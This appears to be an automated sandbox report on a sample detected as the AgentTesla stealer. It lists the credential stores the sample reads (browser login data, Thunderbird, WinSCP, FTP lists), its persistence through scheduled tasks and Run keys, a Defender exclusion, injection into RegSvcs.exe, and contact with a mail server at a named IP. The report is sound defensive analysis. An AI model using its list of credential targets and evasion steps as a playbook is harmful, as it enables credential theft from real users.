                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeQueries volume information: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\Desktop\AWB#150332.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1333001679.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2468581975.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AWB#150332.exe PID: 5432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7200, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AWB#150332.exe PID: 5432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7200, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1333001679.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2468581975.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AWB#150332.exe PID: 5432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7200, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		221
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets151
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Hidden Files and Directories                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568202 Sample: AWB#150332.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 57 mail.azmaplast.com 2->57 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 11 other signatures 2->67 8 AWB#150332.exe 7 2->8         started        12 nYNBzxFhCu.exe 5 2->12         started        14 boqXv.exe 2->14         started        16 boqXv.exe 2->16         started        signatures3 process4 file5 49 C:\Users\user\AppData\...\nYNBzxFhCu.exe, PE32 8->49 dropped 51 C:\Users\...\nYNBzxFhCu.exe:Zone.Identifier, ASCII 8->51 dropped 53 C:\Users\user\AppData\Local\...\tmpFFF1.tmp, XML 8->53 dropped 55 C:\Users\user\AppData\...\AWB#150332.exe.log, ASCII 8->55 dropped 83 Uses schtasks.exe or at.exe to add and modify task schedules 8->83 85 Writes to foreign memory regions 8->85 87 Allocates memory in foreign processes 8->87 89 Adds a directory exclusion to Windows Defender 8->89 18 RegSvcs.exe 1 4 8->18         started        23 powershell.exe 23 8->23         started        25 powershell.exe 23 8->25         started        27 schtasks.exe 1 8->27         started        91 Multi AV Scanner detection for dropped file 12->91 93 Machine Learning detection for dropped file 12->93 95 Injects a PE file into a foreign processes 12->95 29 RegSvcs.exe 12->29         started        31 schtasks.exe 12->31         started        33 conhost.exe 14->33         started        35 conhost.exe 16->35         started        signatures6 process7 dnsIp8 59 mail.azmaplast.com 193.141.65.39, 49707, 49710, 587 KPNNL Iran (ISLAMIC Republic Of) 18->59 47 C:\Users\user\AppData\Roaming\...\boqXv.exe, PE32 18->47 dropped 69 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->69 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->71 73 Loading BitLocker PowerShell Module 23->73 37 conhost.exe 23->37         started        39 WmiPrvSE.exe 23->39         started        41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        75 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->75 77 Tries to steal Mail credentials (via file / registry access) 29->77 79 Tries to harvest and steal ftp login credentials 29->79 81 Tries to harvest and steal browser information (history, passwords, etc) 29->81 45 conhost.exe 31->45         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    AWB#150332.exe26%ReversingLabs
                    AWB#150332.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\boqXv\boqXv.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe26%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://mail.azmaplast.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.azmaplast.com
                    		193.141.65.39
                    		truetrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://mail.azmaplast.comRegSvcs.exe, 00000009.00000002.1333001679.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://account.dyn.com/AWB#150332.exe, 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAWB#150332.exe, 00000000.00000002.1258173545.0000000003161000.00000004.00000800.00020000.00000000.sdmp, nYNBzxFhCu.exe, 0000000C.00000002.1333854899.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0AWB#150332.exe, nYNBzxFhCu.exe.0.drfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            193.141.65.39
                            		mail.azmaplast.comIran (ISLAMIC Republic Of)
                            		286KPNNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1568202
                            Start date and time:2024-12-04 12:52:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:30
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:AWB#150332.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/19@1/1
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 105
                            • Number of non-executed functions: 11
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target boqXv.exe, PID 1196 because it is empty
                            • Execution Graph export aborted for target boqXv.exe, PID 8156 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: AWB#150332.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            06:52:58API Interceptor1x Sleep call for process: AWB#150332.exe modified
                            06:53:01API Interceptor39x Sleep call for process: powershell.exe modified
                            06:53:03API Interceptor175x Sleep call for process: RegSvcs.exe modified
                            06:53:05API Interceptor1x Sleep call for process: nYNBzxFhCu.exe modified
                            12:53:03Task SchedulerRun new task: nYNBzxFhCu path: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                            12:53:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                            12:53:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            193.141.65.39shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                              Massive.exeGet hashmaliciousAgentTeslaBrowse
                                M.BL CSLEBKK2311030B.exeGet hashmaliciousAgentTeslaBrowse
                                  DHL_CBJ520818836689.exeGet hashmaliciousAgentTeslaBrowse
                                    DHL- CBJ520818836689.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      DHL- CBJ520818836689.exeGet hashmaliciousAgentTeslaBrowse
                                        Bank Details.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          invoice and packing list.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
